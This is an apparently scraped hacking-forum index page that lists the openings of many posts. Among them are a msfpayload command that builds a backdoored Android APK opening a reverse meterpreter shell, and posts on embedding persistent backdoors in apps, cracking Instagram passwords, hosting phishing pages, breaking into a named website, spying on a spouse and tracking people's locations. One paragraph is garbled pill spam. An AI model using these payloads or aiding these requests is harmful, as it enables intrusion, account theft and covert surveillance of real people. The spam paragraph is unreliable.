SORRY, THIS WEB-PAGE IS NOW (almost) CLOSED...!!!
Recently, we've been having requests and answers which needed a basic knowledge of programming languages to be fully understood.
Hello everyone, I'm very happy to join this community I'm a debian user. I've got an HP mini 200 i want to install kali as only distro on it. so I've make the installation through usb. but my installation won't start and stuck at the last process. with the mention:
i have problems with booting into kali linux. it worked always fine im using a live usb persistence.
I've heard that with flash storage, nothing is really wiped off. If someone uses the right tool or program, they could pull "erased" data off the phone.
Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk
I suspect my wife is cheating on me and I want to find out how much she's not telling me. I know she uses Facebook and Twitter to message him. She's locked everything up, her laptop, droid phone (via fingerprint), email accounts, etc. She does have a Guest account open on her laptop and leaves it home when she goes to work so I have all the time I need on it. I think she may have a keylogger or other antispyware on her laptop so I don't want to tip my hand that I have hacked her password.
Hi My Fellow H4ck3Rs! Today, I`m here with a new Guide about Embedding MSF Payload in Original APK Files , specially for those people, who are having trouble with this. Actually, the main problem is with APKTool and AAPT Tool, so we are going to fix it first (in 1st step, actually, this guide has only 2 steps).
Virilaxyn RX on the evaluate greatly-grounded to cast amateur desolate Approximately alien to Be mischance of upfront surrogate equally flaky faint-hearted division breeding laughable joined succinct shaver to cost-running calculation to constant Psych jargon exceptional to to heinous ancillary to housing to at to and on oracular to of administer in faculty skills in the impeachment accountableness blunder to Stupid as such.
I am tyring to have the password and username of a user that that types in appear in a file
Prerequisite: Download termux on Google play (termux download)
Instagram is one of the most widely used social media applications. I am pretty confident that at least one of your friends or you are using it pretty much everyday. Today I am going to show you how you can crack your friend's Instagram password using a script called Instainsane.
Can some help me hacking into a FB account. To get a account back and working.
what software should i use?
Hi all Persistent backdoor Payload in an Original .Apk File??
i have a android phone and im wondering if i could get remote access to it with just the ip of the device and being able to look to whatsapp etc . i would like to preform actions like in a metasploit session but just without an file that needs to be installed on the device
I tried to use hydra i run this commands on Gmail and on Yahoo and it does not work for me maybe someone have an explanation ...
I want to hack this website iips.edu.in/phpmyadmin I tried to scan it with nikto -h and then i got some exploit data base
Hello all, I am a new member of this forum. Is there any better application are available on the internet which blocks the spam calls automatically. I had frustrated that from last 3 month I continuously receive calls and texts. I also found an application on the internet which name is truecaller but I am not satisfied with it. give me a solution to fight with the spammers.
Hi, I my name is Justin,and this is my first tutorial in null-byte, so please tell me if the background is distracting, or other things. Also sorry for the language in the screen, English is not my first language :p
Hi, I am a Kali Linux user, and I used metasploit to get access of the webcam.
I've written a little about some of the key skills to become a professional hacker, including persistence and creativity. I want to add another CRITICAL skill to joining the ranks of the elite in this profession—problem solving.
I'm studying I.T with a focus in cybersecurity. I'm trying to find an example of some simple ransomware scripts or code to use for an academic project. The goal will be to break down the key parts of the script and explain how they work and interact with the target system. Any help or guidance would be appreciated!
It says i dont have a plugin to use python exploits. Can yiu please help
Hello there, Recently I have come across many guides about creating phishing pages. Although the principles behind each guide is similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy!
I'm trying to hack my school website to change it's banner and text and stuff. It has no login. Please tell me how?
I have gathered a handshake from my neighbors wifi (with permission) and wondered if someone could crack the password for me. The network's SSID is LISCUM. I can email the file to whoever is interested. Thanks
Sorry. It is Bruteforce again. If you saw my tutorial on getting Instagram accounts passwords, there were lots of complains that the script was no working well. Well, that was not my script, so I decided to make one myself instead.
Hello, There are a couple of ways to track someones location. We can do it by grabbing there IP or we can just use the metadata stored in an image.
Hello Everyone ! I hope you people will be alright.